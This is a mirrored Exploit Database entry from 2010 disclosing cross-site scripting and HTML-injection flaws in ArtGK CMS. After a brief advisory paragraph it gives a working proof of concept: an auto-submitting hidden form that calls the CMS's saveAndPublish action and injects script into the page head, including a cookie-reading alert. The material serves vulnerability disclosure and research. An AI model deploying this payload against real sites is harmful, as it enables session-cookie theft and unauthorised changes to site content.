ArtGK CMS – Cross-Site Scripting / HTML Injection

• Exploit Database
• 81 阅读

• 作者： High-Tech Bridge SA
  日期： 2010-09-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34560/

• source: https://www.securityfocus.com/bid/42923/info
  
  ArtGK CMS is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
  
  Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. 
  
  <form action="http://host/cms/action?async=exit" method="post" name="main" > <input type="hidden" name="_a[0][action]" value="saveAndPublish" /> <input type="hidden" name="_a[0][id]" value="1" /> <input type="hidden" name="_a[0][vars][title]" value="page title" /> <input type="hidden" name="_a[0][vars][description]" value="description" /> <input type="hidden" name="_a[0][vars][keywords]" value="metakeys" /> <input type="hidden" name="_a[0][vars][link]" value="/" /> <input type="hidden" name="_a[0][vars][use_content_in_head]" value="path" /> <input type="hidden" name="_a[0][vars][head]" value='<script type="text/javascript" src="https://www.exploit-db.com/cms/js/ajax.js"> </script><meta name="keywords" content="keywords"/><meta name="description" content="Description"/><script>alert(document.cookie)</script><title>Site Title</title>' /> </form> <script> document.main.submit(); </script> 
  

  Python

  Copy